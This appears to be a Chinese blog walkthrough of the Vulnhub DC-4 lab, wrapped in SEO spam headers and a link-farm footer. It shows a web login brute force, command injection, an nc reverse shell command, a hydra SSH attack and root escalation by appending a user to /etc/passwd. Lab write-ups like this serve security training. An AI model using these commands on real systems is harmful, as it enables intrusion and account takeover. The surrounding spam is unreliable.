当前位置: 首页 > wzjs >正文

顺义区专业网站制作网站建设重庆seo海洋qq

顺义区专业网站制作网站建设,重庆seo海洋qq,五屏网站建设品牌好,wordpress弹窗广告下载地址:https://www.vulnhub.com/entry/dc-4,313/ 扫描IP地址 arp-sacn -l扫描端口,开启了80和22端口 nmap -p- 192.168.112.140访问80端口 扫描目录,并没有发现敏感目录 尝试爆破 爆破成功,用户名admin 密码happy 登录成功 …

下载地址:https://www.vulnhub.com/entry/dc-4,313/

扫描IP地址

arp-sacn -l

扫描端口,开启了80和22端口

nmap -p- 192.168.112.140

访问80端口

扫描目录,并没有发现敏感目录

尝试爆破

爆破成功,用户名admin 密码happy

登录成功

里面是已经执行的三个命令,

ls -l

du -h

df -h

既然可以执行命令,那就可以尝试抓包来修改命令

成功执行whoami

尝试写一句话木马进去,但是我们的php代码被过滤了

换一种方式,尝试反弹shell

nc+192.168.112.132+4444+-e+/bin/bash

成功反弹

接下来就是提权

先看一下版本信息

uname -a

并没有可以利用的脚本

之前nmap扫出有22端口,那可以看一下/home目录下的用户

在jim目录下面找到了一些文件,

jim目录下面有一个文件夹和两个文件,mbox没有权限,test.sh不知道写的啥

只有backups目录下面有一个旧密码备份,这里面应该就有jim的ssh密码

使用hydra爆破一下,将密码字典复制到kali,新建文本文件ps.txt作为hydra的爆破字典

hydra -l jim -P ./ps.txt 192.168.10.150 ssh

得到jim的密码为 jibril04

使用ssh成功登录到jim用户

jim目录权限可以查看mbox文件

里面提示我们在/var/emi里面有一封邮件

邮件内容是我们的另一个用户charles发给jim的,里面有他的密码^xHhA&hvim0y

切换到charles用户,查看一下sudo授权

发现可以无密码执行/usr/bin/teehee

teehee命令可以往一个文件追加内容,可以通过它向/etc/passwd写入内容,新增一个超级用户

向passwd文件中追加一个超级用户

echo "hack::0:0:::/bin/bash" | sudo teehee -a  /etc/passwd

成功提权,找到flag


文章转载自:

http://sV0Snov5.tssmk.cn
http://mnGy8iTc.tssmk.cn
http://35ngPkUg.tssmk.cn
http://wKGmNnlK.tssmk.cn
http://q7wlNuOC.tssmk.cn
http://9mJNegqQ.tssmk.cn
http://8rZQ36aB.tssmk.cn
http://JEFvoTqJ.tssmk.cn
http://bAe8z7XD.tssmk.cn
http://9ssLJW0o.tssmk.cn
http://QOLHog7M.tssmk.cn
http://XGuhpl5F.tssmk.cn
http://VtK81Bhd.tssmk.cn
http://TuAi5O3o.tssmk.cn
http://nDLSF8XW.tssmk.cn
http://MKQN80jG.tssmk.cn
http://QxdtIUqU.tssmk.cn
http://yGmYHBsw.tssmk.cn
http://Wb3UUis1.tssmk.cn
http://7J56FfOP.tssmk.cn
http://VGRA0NLP.tssmk.cn
http://aVmKrVv0.tssmk.cn
http://4H8vnoQu.tssmk.cn
http://vqngd1BA.tssmk.cn
http://ugSCZJ5w.tssmk.cn
http://hi2nBd4D.tssmk.cn
http://uxkFtDRm.tssmk.cn
http://MnoZoStQ.tssmk.cn
http://GvQ90Jae.tssmk.cn
http://vfANZWwc.tssmk.cn
http://www.dtcms.com/wzjs/700287.html

相关文章:

  • 宁波网站优化公司哪家好提升学历励志语录
  • 十大免费货源网站免费版权新开传奇网站999新服网
  • 宜兴网站设计网站改版要重新备案
  • 凡科网建站教程自己做婚恋网站
  • 大沥网站建设制作小语种网站建设 cover
  • 个人网站推广平台大全百度网盘app下载安装手机版
  • 天台县建设规划局网站笔记本做网站
  • 佛山大良营销网站建设asp 网站 内容静态化
  • wordpress网站如何加百度搜索塘厦网站仿做
  • 高校网站建设招标公告中国好设计
  • 南通优普网站建设团队长沙专业网站设计平台
  • 中国网站建设网页设计wordpress企业建站教程
  • wordpress分享视频网站wordpress插件破解下载地址
  • 廊坊做网站厂商定制泰州城乡建设网站
  • 西安网站建设优化服务公司什么平台可以发广告引流
  • 网站建设代码走查个人微信公众平台注册流程
  • 北京网站运营优化公司宁夏网站seo
  • 简洁大方网站建设网站建设职位要求
  • 临沂网站开发多少钱做网站买计划书
  • 怎样建设VR网站做网站如何设计数据库
  • 专门做画册的网站店面设计图片
  • 网站分为四个步骤开发建设做动图的网站
  • 文档下载免费网站微网站建设收费
  • 邢台城乡建设局网站网站权限设计方案
  • 成都百度网站设计公司有哪些网站可以做视频
  • 电子商务网站建设可用性淘宝官网首页入口电脑版网址
  • 织梦网站修改使用教程新手学网站建设
  • 网站外链如何建设阿里云做网站
  • 如何在门户网站做推广方案收费网站解决方案
  • 收录好的网站有哪些制作app开发的公司